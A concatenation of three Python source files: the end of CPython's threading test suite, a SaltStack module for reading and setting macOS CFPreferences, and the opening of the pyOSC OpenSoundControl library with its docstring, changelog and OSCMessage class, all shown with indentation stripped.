r, w = self.pipe()
code = textwrap.dedent(r"""
import os
import random
import threading
import time
def random_sleep():
seconds = random.random() * 0.010
time.sleep(seconds)
class Sleeper:
def __del__(self):
random_sleep()
tls = threading.local()
def f():
# Sleep a bit so that the thread is still running when
# Py_EndInterpreter is called.
random_sleep()
tls.x = Sleeper()
os.write(%d, b"x")
threading.Thread(target=f).start()
random_sleep()
""" % (w,))
ret = test.support.run_in_subinterp(code)
self.assertEqual(ret, 0)
# The thread was joined properly.
self.assertEqual(os.read(r, 1), b"x")
@cpython_only
def test_daemon_threads_fatal_error(self):
subinterp_code = f"""if 1:
import os
import threading
import time
def f():
# Make sure the daemon thread is still running when
# Py_EndInterpreter is called.
time.sleep({test.support.SHORT_TIMEOUT})
threading.Thread(target=f, daemon=True).start()
"""
script = r"""if 1:
import _testcapi
_testcapi.run_in_subinterp(%r)
""" % (subinterp_code,)
with test.support.SuppressCrashReport():
rc, out, err = assert_python_failure("-c", script)
self.assertIn("Fatal Python error: Py_EndInterpreter: "
"not the last thread", err.decode())
class ThreadingExceptionTests(BaseTestCase):
# A RuntimeError should be raised if Thread.start() is called
# multiple times.
def test_start_thread_again(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, thread.start)
thread.join()
def test_joining_current_thread(self):
current_thread = threading.current_thread()
self.assertRaises(RuntimeError, current_thread.join);
def test_joining_inactive_thread(self):
thread = threading.Thread()
self.assertRaises(RuntimeError, thread.join)
def test_daemonize_active_thread(self):
thread = threading.Thread()
thread.start()
self.assertRaises(RuntimeError, setattr, thread, "daemon", True)
thread.join()
def test_releasing_unacquired_lock(self):
lock = threading.Lock()
self.assertRaises(RuntimeError, lock.release)
def test_recursion_limit(self):
# Issue 9670
# test that excessive recursion within a non-main thread causes
# an exception rather than crashing the interpreter on platforms
# like Mac OS X or FreeBSD which have small default stack sizes
# for threads
script = """if True:
import threading
def recurse():
return recurse()
def outer():
try:
recurse()
except RecursionError:
pass
w = threading.Thread(target=outer)
w.start()
w.join()
print('end of main thread')
"""
expected_output = "end of main thread\n"
p = subprocess.Popen([sys.executable, "-c", script],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""if True:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_1(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
def test_bare_raise_in_brand_new_thread(self):
def bare_raise():
raise
class Issue27558(threading.Thread):
exc = None
def run(self):
try:
bare_raise()
except Exception as exc:
self.exc = exc
thread = Issue27558()
thread.start()
thread.join()
self.assertIsNotNone(thread.exc)
self.assertIsInstance(thread.exc, RuntimeError)
# explicitly break the reference cycle to not leak a dangling thread
thread.exc = None
class ThreadRunFail(threading.Thread):
def run(self):
raise ValueError("run failed")
class ExceptHookTests(BaseTestCase):
def test_excepthook(self):
with support.captured_output("stderr") as stderr:
thread = ThreadRunFail(name="excepthook thread")
thread.start()
thread.join()
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {thread.name}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("run failed")', stderr)
self.assertIn('ValueError: run failed', stderr)
@support.cpython_only
def test_excepthook_thread_None(self):
# threading.excepthook called with thread=None: log the thread
# identifier in this case.
with support.captured_output("stderr") as stderr:
try:
raise ValueError("bug")
except Exception as exc:
args = threading.ExceptHookArgs([*sys.exc_info(), None])
try:
threading.excepthook(args)
finally:
# Explicitly break a reference cycle
args = None
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {threading.get_ident()}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("bug")', stderr)
self.assertIn('ValueError: bug', stderr)
def test_system_exit(self):
class ThreadExit(threading.Thread):
def run(self):
sys.exit(1)
# threading.excepthook() silently ignores SystemExit
with support.captured_output("stderr") as stderr:
thread = ThreadExit()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(), '')
def test_custom_excepthook(self):
args = None
def hook(hook_args):
nonlocal args
args = hook_args
try:
with support.swap_attr(threading, 'excepthook', hook):
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(args.exc_type, ValueError)
self.assertEqual(str(args.exc_value), 'run failed')
self.assertEqual(args.exc_traceback, args.exc_value.__traceback__)
self.assertIs(args.thread, thread)
finally:
# Break reference cycle
args = None
def test_custom_excepthook_fail(self):
def threading_hook(args):
raise ValueError("threading_hook failed")
err_str = None
def sys_hook(exc_type, exc_value, exc_traceback):
nonlocal err_str
err_str = str(exc_value)
with support.swap_attr(threading, 'excepthook', threading_hook), \
support.swap_attr(sys, 'excepthook', sys_hook), \
support.captured_output('stderr') as stderr:
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(),
'Exception in threading.excepthook:\n')
self.assertEqual(err_str, 'threading_hook failed')
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
timer1.join()
timer2.join()
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
extra = {"ThreadError"}
blacklist = {'currentThread', 'activeCount'}
support.check__all__(self, threading, ('threading', '_thread'),
extra=extra, blacklist=blacklist)
class InterruptMainTests(unittest.TestCase):
def test_interrupt_main_subthread(self):
# Calling start_new_thread with a function that executes interrupt_main
# should raise KeyboardInterrupt upon completion.
def call_interrupt():
_thread.interrupt_main()
t = threading.Thread(target=call_interrupt)
with self.assertRaises(KeyboardInterrupt):
t.start()
t.join()
t.join()
def test_interrupt_main_mainthread(self):
# Make sure that if interrupt_main is called in main thread that
# KeyboardInterrupt is raised instantly.
with self.assertRaises(KeyboardInterrupt):
_thread.interrupt_main()
def test_interrupt_main_noerror(self):
handler = signal.getsignal(signal.SIGINT)
try:
# No exception should arise.
signal.signal(signal.SIGINT, signal.SIG_IGN)
_thread.interrupt_main()
signal.signal(signal.SIGINT, signal.SIG_DFL)
_thread.interrupt_main()
finally:
# Restore original handler
signal.signal(signal.SIGINT, handler)
class AtexitTests(unittest.TestCase):
def test_atexit_output(self):
rc, out, err = assert_python_ok("-c", """if True:
import threading
def run_last():
print('parrot')
threading._register_atexit(run_last)
""")
self.assertFalse(err)
self.assertEqual(out.strip(), b'parrot')
def test_atexit_called_once(self):
rc, out, err = assert_python_ok("-c", """if True:
import threading
from unittest.mock import Mock
mock = Mock()
threading._register_atexit(mock)
mock.assert_not_called()
# force early shutdown to ensure it was called once
threading._shutdown()
mock.assert_called_once()
""")
self.assertFalse(err)
def test_atexit_after_shutdown(self):
# The only way to do this is by registering an atexit within
# an atexit, which is intended to raise an exception.
rc, out, err = assert_python_ok("-c", """if True:
import threading
def func():
pass
def run_last():
threading._register_atexit(func)
threading._register_atexit(run_last)
""")
self.assertTrue(err)
self.assertIn("RuntimeError: can't register atexit after shutdown",
err.decode())
if __name__ == "__main__":
unittest.main()
|
mac_prefs.py
|
# -*- coding: utf-8 -*-
'''
Support for reading and writing of preference key/values with ObjectiveC's CFPreferences
Modules. Documentation on the Modules can be found here. https://developer.apple.com/documentation/corefoundation/preferences_utilities?language=objc
This appears to be significantly faster than shelling out to `defaults`.
This module has some caveats.
1. Requires the PyObjC package. It will try to import this package from Salts
path, if that fails it will try to use the system PyObjC that ships with macOS.
'''
# py libs
import logging
import sys
import os
import pwd
import multiprocessing
# salt libs
import salt.utils
import salt.utils.platform
from salt.exceptions import CommandExecutionError
log = logging.getLogger(__name__)
try:
import Foundation
from PyObjCTools import Conversion
log.trace('module.mac_prefs - PyObjC import successful.')
except ImportError:
log.trace('module.mac_prefs - Failed to Import PyObjC, Using Sys.')
sys.path.append('/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC')
import Foundation
from PyObjCTools import Conversion
__virtualname__ = 'prefs'
__func_alias__ = {
'set_': 'set',
'list_': 'list',
}
def __virtual__():
if salt.utils.platform.is_darwin():
return __virtualname__
return (False, 'module.mac_prefs only available on macOS.')
def _convert_pyobjc_objects(pref):
'''
Types get returned as ObjectiveC classes from PyObjC and salt has a hard time
writing those out, so this function will convert NSDictionary and NSArray
object to normal list and dictionary python objects.
'''
if isinstance(pref, Foundation.NSDate):
log.debug('mac_prefs._convert_pyobjc_objects - '
'converting "{}" NSDate to string...'.format(pref))
return str(pref)
return Conversion.pythonCollectionFromPropertyList(pref)
def _get_user_and_host(user, host):
'''
returns a tuple of kCFPreferences(Any/Current)User and
kCFPreferences(Any/Current)Host.
'''
if user.lower() == 'any':
user_pref = Foundation.kCFPreferencesAnyUser
elif user.lower() == 'current':
user_pref = Foundation.kCFPreferencesCurrentUser
else:
raise CommandExecutionError(
'Error proccessing parameter "user": [{0}], must be "any" or'
' "current". NOT [{0}]'.format(user)
)
if host.lower() == 'any':
host_pref = Foundation.kCFPreferencesAnyHost
elif host.lower() == 'current':
host_pref = Foundation.kCFPreferencesCurrentHost
else:
raise CommandExecutionError(
'Error proccessing parameter "host": [{0}], must be "any" or'
' "current". NOT [{0}]'.format(host)
)
log.debug('Using user domain: [{}] and host domain: [{}]'.format(user_pref,
host_pref))
return (user_pref, host_pref)
def _read_pref(name, domain, user, host, runas, runas_data):
'''
helper function for reading the preference, either at the user level
or system level
'''
if runas:
try:
# convert to uid for later use.
uid = pwd.getpwnam(runas).pw_uid
except KeyError:
raise CommandExecutionError(
'Set to runas user {}, this user'
' does not exist.'.format(runas)
)
# need to run as the user
log.debug('Setting EUID to {}'.format(runas))
os.setuid(uid)
if user:
user_domain, host_domain = _get_user_and_host(user, host)
log.debug('Reading key: "{}" in domain: "{}"'.format(name, domain))
value = Foundation.CFPreferencesCopyValue(name,
domain,
user_domain,
host_domain)
if runas:
runas_data.put(value)
return
#need to bring ourselves back up to root
path = '/var/root/Library/Preferences/'
d_path = os.path.join(path, domain)
log.debug('Reading key: "{}" in domain: "{}" at "{}"'.format(name, domain, d_path))
return Foundation.CFPreferencesCopyAppValue(name, domain)
def _set_pref(name, value, domain, user, host, runas, runas_data):
'''
sets the pref for the user not at the app value level
returns true or false if the preference was set correctly or not.
'''
if runas:
try:
# convert to uid for later use.
uid = pwd.getpwnam(runas).pw_uid
except KeyError:
raise CommandExecutionError(
'Set to runas user {}, this user'
' does not exist.'.format(runas)
)
# need to run as the user
log.debug('Setting UID to {}'.format(runas))
os.setuid(uid)
if user:
pref_user, pref_host = _get_user_and_host(user, host)
path = '/Library/Preferences/'
d_path = os.path.join(path, domain)
log.debug('Settting key: "{}" to value: "{}" in '
'domain: "{}" in "{}"'.format(name, value, domain, d_path))
try:
set_val = Foundation.CFPreferencesSetValue(name,
value,
domain,
pref_user,
pref_host)
Foundation.CFPreferencesAppSynchronize(domain)
return set_val
except BaseException:
log.warning('prefs._set_pref caught exception on user set.')
return False
path = '/var/root/Library/Preferences/'
d_path = os.path.join(path, domain)
log.debug('Settting key: "{}" to value: "{}" in'
' domain: "{}" in "{}"'.format(name, value, domain, d_path))
Foundation.CFPreferencesSetAppValue(name, value, domain)
return Foundation.CFPreferencesAppSynchronize(domain)
def read(name, domain, user=None, host=None, runas=None, runas_data=None):
'''
Read a preference using CFPreferences.
name
The preference key to read.
domain
The domain to in which the key should be read.
user
The user domain to use, either 'current' or 'any'
host
The host domain to use, either 'current' or 'any'
runas
The user to run as should be a short username.
:return: The value of the key, or None if it doesn't exist.
CLI Example:
.. code-block:: bash
salt '*' prefs.read IdleTime com.apple.ScreenSaver
salt '*' prefs.read IdleTime com.apple.ScreenSaver True
'''
if (runas and not host) or (runas and not user)\
or (runas and not user and not host):
raise CommandExecutionError(
'If using "runas" you must specify a "user" and "host" domains.'
)
if user and not host or host and not user:
raise CommandExecutionError(
'If using "host" or "user" you must specify both not just one.'
)
return _convert_pyobjc_objects(_read_pref(name,
domain,
user,
host,
runas,
runas_data))
def set_(name, value, domain, user=None, host=None, runas=None, runas_data=None):
'''
Set a preference value using CFPreferences.
name
The preference key to set.
value
The value to which the key should be set. If you want to delete or
remove the key set this parameter to None.
domain
The domain to which the key and value should be set in.
user
The user domain to use, either 'current' or 'any'
host
The host domain to use, either 'current' or 'any'
runas
The user to run as should be a short username.
:return: A Boolean on whether or not the preference was set correctly.
:rtype: bool
CLI Example:
.. code-block:: bash
salt '*' prefs.set IdleTime 180 com.apple.ScreenSaver
salt '*' prefs.set IdleTime 180 com.apple.ScreenSaver True
'''
if (runas and not host) or (runas and not user)\
or (runas and not user and not host):
raise CommandExecutionError(
'If using "runas" you must specify a "user" and "host" domains.'
)
if user and not host or host and not user:
raise CommandExecutionError(
'If using "host" or "user" you must specify both not just one.'
)
if runas:
multiprocessing.set_start_method('spawn')
proc = multiprocessing.Process(target=_set_pref, args=(name, value, domain, user, host, runas, runas_data))
proc.start()
else:
set_val = _set_pref(name, value, domain, user, host, runas, runas_data)
# get the value to check if it was set correctly.
if runas:
runas_data = multiprocessing.Queue()
proc = multiprocessing.Process(target=read, args=(name, value, domain, user, host, runas, runas_data))
proc.start()
new_val = runas_data.get()
else:
new_val = read(name, domain, user, host, runas, runas_data)
log.debug('New value for key: "{}" in domain: '
'"{}" is "{}"'.format(name, domain, new_val))
# check to see if everything was set correctly
if new_val != value:
log.debug('prefs.set Value of {}, for key {}, '
'was not set properly.'.format(value, name))
return False
return True
def list_(name, user, host, runas=None, values=False):
'''
List all Keys in the given domain.
name
The preference domain to get keys from.
user
The user domain to use, either 'current' or 'any'
host
The host domain to use, either 'current' or 'any'
runas
The user to run as should be a short username.
values
Pass true to return a dictionary of the key value pairs.
:rtype: list,dict
CLI Example:
.. code-block:: bash
salt '*' prefs.list com.apple.RemoteManagement any any values=True
salt '*' prefs.list com.apple.ScreenSaver current current runas=deadb33f
'''
log.debug('Gathering Key List for {}'.format(name))
if (runas and not host) or (runas and not user)\
or (runas and not user and not host):
raise CommandExecutionError(
'If using "runas" you must specify a "user" and "host" domains.'
)
if user and not host or host and not user:
raise CommandExecutionError(
'If using "host" or "user" you must specify both not just one.'
)
user_domain, host_domain = _get_user_and_host(user, host)
if runas:
try:
# convert to uid for later use.
uid = pwd.getpwnam(runas).pw_uid
except KeyError:
raise CommandExecutionError(
'Set to runas user [{}], this user'
' does not exist.'.format(runas)
)
# need to run as the user
log.debug('Setting EUID to [{}]'.format(runas))
os.seteuid(uid)
key_list = Foundation.CFPreferencesCopyKeyList(name, user_domain, host_domain)
os.seteuid(0)
con_key_list = _convert_pyobjc_objects(key_list) or []
log.debug('Key list: "{}"'.format(con_key_list))
if not values:
return con_key_list
value_dict = dict()
try:
for item in con_key_list:
value_dict[item] = read(item, name, user, host, runas)
except TypeError as exception:
return None
log.debug('Values List: "{}"'.format(value_dict))
return value_dict
|
OSC.py
|
#!/usr/bin/python
"""
This module contains an OpenSoundControl implementation (in Pure Python), based
(somewhat) on the good old 'SimpleOSC' implementation by Daniel Holth & Clinton
McChesney.
This implementation is intended to still be 'simple' to the user, but much more
complete (with OSCServer & OSCClient classes) and much more powerful (the
OSCMultiClient supports subscriptions & message-filtering, OSCMessage &
OSCBundle are now proper container-types)
===============================================================================
OpenSoundControl
===============================================================================
OpenSoundControl is a network-protocol for sending (small) packets of addressed
data over network sockets. This OSC-implementation supports the classical
UDP/IP protocol for sending and receiving packets but provides as well support
for TCP/IP streaming, whereas the message size is prepended as int32 (big
endian) before each message/packet.
OSC-packets come in two kinds:
- OSC-messages consist of an 'address'-string (not to be confused with a
(host:port) network-address!), followed by a string of 'typetags'
associated with the message's arguments (ie. 'payload'), and finally the
arguments themselves, encoded in an OSC-specific way. The OSCMessage class
makes it easy to create & manipulate OSC-messages of this kind in a
'pythonesque' way (that is, OSCMessage-objects behave a lot like lists)
- OSC-bundles are a special type of OSC-message containing only
OSC-messages as 'payload'. Recursively. (meaning; an OSC-bundle could
contain other OSC-bundles, containing OSC-bundles etc.)
OSC-bundles start with the special keyword '#bundle' and do not have an
OSC-address (but the OSC-messages a bundle contains will have OSC-addresses!).
Also, an OSC-bundle can have a timetag, essentially telling the receiving
server to 'hold' the bundle until the specified time. The OSCBundle class
allows easy cration & manipulation of OSC-bundles.
For further information see also http://opensoundcontrol.org/spec-1_0
-------------------------------------------------------------------------------
To send OSC-messages, you need an OSCClient, and to receive OSC-messages you
need an OSCServer.
The OSCClient uses an 'AF_INET / SOCK_DGRAM' type socket (see the 'socket'
module) to send binary representations of OSC-messages to a remote host:port
address.
The OSCServer listens on an 'AF_INET / SOCK_DGRAM' type socket bound to a local
port, and handles incoming requests. Either one-after-the-other (OSCServer) or
in a multi-threaded / multi-process fashion (ThreadingOSCServer/
ForkingOSCServer). If the Server has a callback-function (a.k.a. handler)
registered to 'deal with' (i.e. handle) the received message's OSC-address,
that function is called, passing it the (decoded) message.
The different OSCServers implemented here all support the (recursive) un-
bundling of OSC-bundles, and OSC-bundle timetags.
In fact, this implementation supports:
- OSC-messages with 'i' (int32), 'f' (float32), 'd' (double), 's' (string) and
'b' (blob / binary data) types
- OSC-bundles, including timetag-support
- OSC-address patterns including '*', '?', '{,}' and '[]' wildcards.
(please *do* read the OSC-spec! http://opensoundcontrol.org/spec-1_0 it
explains what these things mean.)
In addition, the OSCMultiClient supports:
- Sending a specific OSC-message to multiple remote servers
- Remote server subscription / unsubscription (through OSC-messages, of course)
- Message-address filtering.
-------------------------------------------------------------------------------
SimpleOSC:
Copyright (c) Daniel Holth & Clinton McChesney.
pyOSC:
Copyright (c) 2008-2010, Artem Baguinski <artm@v2.nl> et al., Stock, V2_Lab, Rotterdam, Netherlands.
Streaming support (OSC over TCP):
Copyright (c) 2010 Uli Franke <uli.franke@weiss.ch>, Weiss Engineering, Uster, Switzerland.
-------------------------------------------------------------------------------
Changelog:
-------------------------------------------------------------------------------
v0.3.0 - 27 Dec. 2007
Started out to extend the 'SimpleOSC' implementation (v0.2.3) by Daniel Holth & Clinton McChesney.
Rewrote OSCMessage
Added OSCBundle
v0.3.1 - 3 Jan. 2008
Added OSClient
Added OSCRequestHandler, loosely based on the original CallbackManager
Added OSCServer
Removed original CallbackManager
Adapted testing-script (the 'if __name__ == "__main__":' block at the end) to use new Server & Client
v0.3.2 - 5 Jan. 2008
Added 'container-type emulation' methods (getitem(), setitem(), __iter__() & friends) to OSCMessage
Added ThreadingOSCServer & ForkingOSCServer
- 6 Jan. 2008
Added OSCMultiClient
Added command-line options to testing-script (try 'python OSC.py --help')
v0.3.3 - 9 Jan. 2008
Added OSC-timetag support to OSCBundle & OSCRequestHandler
Added ThreadingOSCRequestHandler
v0.3.4 - 13 Jan. 2008
Added message-filtering to OSCMultiClient
Added subscription-handler to OSCServer
Added support fon numpy/scipy int & float types. (these get converted to 'standard' 32-bit OSC ints / floats!)
Cleaned-up and added more Docstrings
v0.3.5 - 14 aug. 2008
Added OSCServer.reportErr(...) method
v0.3.6 - 19 April 2010
Added Streaming support (OSC over TCP)
Updated documentation
Moved pattern matching stuff into separate class (OSCAddressSpace) to
facilitate implementation of different server and client architectures.
Callbacks feature now a context (object oriented) but dynamic function
inspection keeps the code backward compatible
Moved testing code into separate testbench (testbench.py)
-----------------
Original Comments
-----------------
> Open SoundControl for Python
> Copyright (C) 2002 Daniel Holth, Clinton McChesney
>
> This library is free software; you can redistribute it and/or modify it under
> the terms of the GNU Lesser General Public License as published by the Free
> Software Foundation; either version 2.1 of the License, or (at your option) any
> later version.
>
> This library is distributed in the hope that it will be useful, but WITHOUT ANY
> WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A
> PARTICULAR PURPOSE. See the GNU Lesser General Public License for more
> details.
>
> You should have received a copy of the GNU Lesser General Public License along
> with this library; if not, write to the Free Software Foundation, Inc., 59
> Temple Place, Suite 330, Boston, MA 02111-1307 USA
>
> For questions regarding this module contact Daniel Holth <dholth@stetson.edu>
> or visit http://www.stetson.edu/~ProctoLogic/
>
> Changelog:
> 15 Nov. 2001:
> Removed dependency on Python 2.0 features.
> - dwh
> 13 Feb. 2002:
> Added a generic callback handler.
> - dwh
"""
import math, re, socket, select, string, struct, sys, threading, time, types, array, errno, inspect
from SocketServer import UDPServer, DatagramRequestHandler, ForkingMixIn, ThreadingMixIn, StreamRequestHandler, TCPServer
from contextlib import closing
global version
version = ("0.3","6", "$Rev: 6382 $"[6:-2])
global FloatTypes
FloatTypes = [types.FloatType]
global IntTypes
IntTypes = [types.IntType]
global NTP_epoch
from calendar import timegm
NTP_epoch = timegm((1900,1,1,0,0,0)) # NTP time started in 1 Jan 1900
del timegm
global NTP_units_per_second
NTP_units_per_second = 0x100000000 # about 232 picoseconds
##
# numpy/scipy support:
##
try:
from numpy import typeDict
for ftype in ['float32', 'float64', 'float128']:
try:
FloatTypes.append(typeDict[ftype])
except KeyError:
pass
for itype in ['int8', 'int16', 'int32', 'int64']:
try:
IntTypes.append(typeDict[itype])
IntTypes.append(typeDict['u' + itype])
except KeyError:
pass
# thanks for those...
del typeDict, ftype, itype
except ImportError:
pass
######
#
# OSCMessage classes
#
######
class OSCMessage(object):
""" Builds typetagged OSC messages.
OSCMessage objects are container objects for building OSC-messages.
On the 'front' end, they behave much like list-objects, and on the 'back' end
they generate a binary representation of the message, which can be sent over a network socket.
OSC-messages consist of an 'address'-string (not to be confused with a (host, port) IP-address!),
followed by a string of 'typetags' associated with the message's arguments (ie. 'payload'),
and finally the arguments themselves, encoded in an OSC-specific way.
On the Python end, OSCMessage are lists of arguments, prepended by the message's address.
The message contents can be manipulated much like a list:
>>> msg = OSCMessage("/my/osc/address")
>>> msg.append('something')
>>> msg.insert(0, 'something else')
>>> msg[1] = 'entirely'
>>> msg.extend([1,2,3.])
>>> msg += [4, 5, 6.]
>>> del msg[3:6]
>>> msg.pop(-2)
5
>>> print msg
/my/osc/address ['something else', 'entirely', 1, 6.0]
OSCMessages can be concatenated with the + operator. In this case, the resulting OSCMessage
inherits its address from the left-hand operand. The right-hand operand's address is ignored.
To construct an 'OSC-bundle' from multiple OSCMessage, see OSCBundle!
Additional methods exist for retreiving typetags or manipulating items as (typetag, value) tuples.
"""
def __init__(self, address="", *args):
"""Instantiate a new OSCMessage.
The OSC-address can be specified with the 'address' argument.
The rest of the arguments are appended as data.
"""
self.clear(address)
if len(args)>0:
self.append(*args)
def setAddress(self, address):
"""Set or change the OSC-address
"""
self.address = address
def clear(self, address=""):
"""Clear (or set a new) OSC-address and clear any arguments appended so far
"""
self.address = address
self.clearData()
def clearData(self):
"""Clear any arguments appended so far
"""
self.typetags = ","
self.message = ""
def append(self, argument, typehint=None):
"""Appends data to the message, updating the typetags based on
the argument's type. If the argument is a blob (counted
string) pass in 'b' as typehint.
'argument' may also be a list or tuple, in which case its elements
will get appended one-by-one, all using the provided typehint
"""
if type(argument) == types.DictType:
argument = argument.items()
elif isinstance(argument, OSCMessage):
raise TypeError("Can only append 'OSCMessage' to 'OSCBundle'")
if hasattr(argument, '__iter__'):
for arg in argument:
self.append(arg, typehint)
return
if typehint == 'b':
binary = OSCBlob(argument)
tag = 'b'
elif typehint == 't':
binary = OSCTimeTag(argument)
tag = 't'
else:
tag, binary = OSCArgument(argument, typehint)
self.typetags += tag
self.message += binary
def getBinary(self):
"""Returns the binary representation of the message
"""
binary = OSCString(self.address)
binary += OSCString(self.typetags)
binary += self.message
return binary
def __repr__(self):
"""Returns a string containing the decode Message
"""
return str(decodeOSC(self.getBinary()))
def __str__(self):
"""Returns the Message's address and contents as a string.
"""
return "%s %s" % (self.address, str(self.values()))
def __len__(self):
"""Returns the number of arguments appended so far
"""
return (len(self.typetags) - 1)
def __eq__(self, other):
"""Return True if two OSCMessages have the same address & content
"""
if not isinstance(other, self.__class__):
return False
return (self.address == other.address) and (self.typetags == other.typetags) and (self.message == other.message)
def __ne__(self, other):
"""Return (not self.__eq__(other))
"""
return not self.__eq__(other)
def __add__(self, values):
"""Returns a copy of self, with the contents of 'values' appended
(see the 'extend()' method, below)
"""
msg = self.copy()
msg.extend(values)
return msg
def __iadd__(self, values):
"""Appends the contents of 'values'
(equivalent to 'extend()', below)
Returns self
"""
self.extend(values)
return self
def __radd__(self, values):
"""Appends the contents of this OSCMessage to 'values'
Returns the extended 'values' (list or tuple)
"""
out = list(values)
out.extend(self.values())
if type(values) == types.TupleType:
return tuple(out)
return out
def _reencode(self, items):
"""Erase & rebuild the OSCMessage contents from the given
list of (typehint, value) tuples"""
self.clearData()
for item in items:
self.append(item[1], item[0])
def values(self):
"""Returns a list of the arguments appended so far
"""
return decodeOSC(self.getBinary())[2:]
def tags(self):
"""Returns a list of typetags of the appended arguments
"""
return list(self.typetags.lstrip(','))
def items(self):
"""Returns a list of (typetag, value) tuples for
the arguments appended so far
"""
out = []
values = self.values()
typetags = self.tags()
for i in range(len(values)):
out.append((typetags[i], values[i]))
return out
def __contains__(self, val):
"""Test if the given value appears in the OSCMessage's arguments
"""
return (val in self.values())
def __getitem__(self, i):
"""Returns the indicated argument (or slice)
"""
return self.values()[i]
def __delitem__(self, i):
"""Removes the indicated argument (or slice)
"""
items = self.items()
del items[i]
self._reencode(items)
def _buildItemList(self, values, typehint=None):
if isinstance(values, OSCMessage):
items = values.items()
elif type(values) == types.ListType:
items = []
for val in values:
if type(val) == types.TupleType:
items.append(val[:2])
else:
items.append((typehint, val))
elif type(values) == types.TupleType:
items = [values[:2]]
else:
items = [(typehint, values)]
return items
def __setitem__(self, i, val):
"""Set indicatated argument (or slice) to a new value.
'val' can be a single int/float/string, or a (typehint, value) tuple.
Or, if 'i' is a slice, a list of these or another OSCMessage.
"""
items = self.items()
new_items = self._buildItemList(val)
if type(i) != types.SliceType:
if len(new_items) != 1:
raise TypeError("single-item assignment expects a single value or a (typetag, value) tuple")
new_items = new_items[0]
# finally...
items[i] = new_items
self._reencode(items)
def setItem(self, i, val, typehint=None):
"""Set indicated argument to a new value (with typehint)
"""
items = self.items()
items[i] = (typehint, val)
self._reencode(items)
def copy(self):
"""Returns a deep copy of this OSCMessage
"""
msg = self.__class__(self.address)
msg.typetags = self.typetags
msg.message = self.message
return msg
def count(self, val):
"""Returns the number of times the given value occurs in the OSCMessage's arguments
"""
return self.values().count(val)
def index(self, val):
"""Returns the index of the first occurence of the given value in the OSCMessage's arguments.
Raises ValueError if val isn't found
"""
return self.values().index(val)
def extend(self, values):
"""Append the contents of 'values' to this OSCMessage.
'values' can be another OSCMessage, or a list/tuple of ints/floats/strings
"""
items = self.items() + self._buildItemList(values)
self._reencode(items)
def insert(self, i, val, typehint = None):
"""Insert given value (with optional typehint) into the OSCMessage
at the given index.
"""
items = self.items()
for item in reversed(self._buildItemList(val)):
items.insert(i, item)
self._reencode(items)
def popitem(self, i):
"""Delete the indicated argument from the OSCMessage, and return it
as a (typetag, value) tuple.
"""
items = self.items()
item = items.pop(i)
self._reencode(items)
return item
def pop(self, i):
"""Delete the indicated argument from the OSCMessage, and return it.
"""
return self.popitem(i)[1]
def reverse(self):
"""Reverses the arguments of the OSCMessage (in place)
"""
items = self.items()
items.reverse()
self._reencode(items)
def remove(self, val):
"""Removes the first argument with the given value from the OSCMessage.
